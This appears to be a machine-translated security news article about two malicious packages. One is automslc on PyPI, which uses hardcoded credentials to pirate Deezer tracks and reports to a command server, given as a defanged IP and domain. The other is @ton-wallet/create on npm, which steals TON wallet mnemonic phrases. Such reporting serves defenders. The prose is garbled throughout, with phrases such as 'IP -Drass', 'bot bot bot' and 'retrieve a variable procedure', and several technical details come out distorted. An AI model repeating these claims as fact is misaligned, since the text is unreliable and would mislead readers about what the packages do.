Cybersecurity researchers have indicated the Python Python Package (Pypi) malicious Python library, which facilitates an unauthorized download of music from Music Streaming Service Deezer.
In this package – Automslc, which is now loaded more than 104,000 times. For the first time published in May 2019, this Remains are available on Pypi from writing.
“Although the Automslc that was downloaded More than 100,000 times supposed to offer musical automation and search metadata, it is hidden bypassing Deezer’s access restrictions, built up hard credentials and talking to the external team server and control (C2), “Socket Kirill Boychenko Research – Note In a report published today.
In particular, the package is designed to enter the French streaming platform with custom and hard credentials, collect metadata related to track, and download full audio files in violation of API Deezer.
The package also periodically talks to a remote server located on “54.39.49 (.) 17: 8031” to provide updates of the load state, which thus gives the centralized control over the coordinated music of the pirated operation.
Otherwise, AutomslC effectively turns packages to the illegal network to facilitate the download of mass music into an unauthorized order. IP -Drass is associated with a domain called “Automusic (.) Win”, which is said to be used by an actor threatening to control the distributed loading operation.
“API Deezer conditions prohibit local or autonomous repository of full sound, but by loading and deciphering whole tracks, Automslc bypasses this restriction, potentially subjecting the risk of legal consequences,” said Boychenko.
Disclosure occurs when the software chain safety company talked in detail about the NPM Rogue package called @ton-wallet/CREATE, which was found theft melmonic phrases From non -suspicious users and developers in the Ton ecosystem, simultaneously pretending to be a legal package @ton/ton.
The package, first published In the NPM register in August 2024, attracted 584 boot Today. It remains available for download.
The malicious functionality laid into the library is able to retrieve a variable procedure. The information is transmitted from the bot bot bot -controlled attacker.
“This attack creates serious safety risks of supply chain, focusing on developers and users who integrate into their TON TON applications – Note. “Regular dependence audit and automated scan tools should be used to detect abnormal or malicious behavior in other packages before they are integrated into production conditions.”
